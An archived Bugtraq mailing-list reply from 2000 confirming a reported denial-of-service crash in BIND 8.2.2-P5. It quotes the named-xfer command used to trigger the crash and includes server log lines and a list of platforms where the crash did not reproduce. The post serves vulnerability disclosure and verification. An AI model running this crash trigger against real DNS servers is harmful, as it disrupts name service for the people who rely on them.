[17568] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: BIND 8.2.2-P5 Possible DOS

daemon@ATHENA.MIT.EDU (Walter Hop)
Thu Nov 9 02:11:04 2000

Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id:  <153031338.20001108210527@skydancer.nl>
Date:         Wed, 8 Nov 2000 21:05:27 +0100
Reply-To: Walter Hop <walter@SKYDANCER.NL>
From: Walter Hop <walter@SKYDANCER.NL>
X-To:         "Fabio Pietrosanti (naif)" <naif@inet.it>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <Pine.LNX.4.30.0011071339510.29294-100000@naif.inet.it>

[in reply to fabio@TELEMAIL.IT, 07-11-2000]

> <naif@naif> [~/bind/src822p5/bin/named-xfer] $ ./named-xfer  -z zone.pippo.com  -d 9 -f pics -Z dns.pippo.com
> named-xfer[29297]: send AXFR query 0 to 192.168.1.1
> named-xfer[29297]: premature EOF, fetching "zone.pippo.com"
>
> Then the server "*** CRASHED ***" .

> I should assume that bind 8.2.2-P5 it's vulnerable ( Please someone test
> and confirm this kind of dos)

Yes; I got BIND-8.2.2-P5 on a RH5.2/Linux 2.0.38 box to die using the above
command. These were the last log messages:

Nov  8 20:36:06 cascade named[396]: unsupported XFR (type ZXFR) of
                "xxx.nl" (IN) to [xxx.xxx.xxx.xxx].4174
Nov  8 20:36:55 cascade named[396]: db_freedata: DB_F_FREE set
Nov  8 20:36:55 cascade named[396]: db_freedata: DB_F_FREE set

I haven't been able to reproduce this on:
BIND-8.2.2-P5 on RH6.1, Linux 2.2.12-20smp
BIND-8.2.2-P5-NOESW on FreeBSD 3.4-RELEASE
BIND-8.2.3-T5B on FreeBSD 4.1-RELEASE

--
 Walter Hop <walter@skydancer.nl> | +31 6 24290808 | PGP: 0xD4DD8DEB
 Mail agreement-request@skydancer.nl to retrieve the email agreement.


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[17568] in bugtraq

Re: BIND 8.2.2-P5 Possible DOS

daemon@ATHENA.MIT.EDU (Walter Hop)Thu Nov 9 02:11:04 2000

daemon@ATHENA.MIT.EDU (Walter Hop)
Thu Nov 9 02:11:04 2000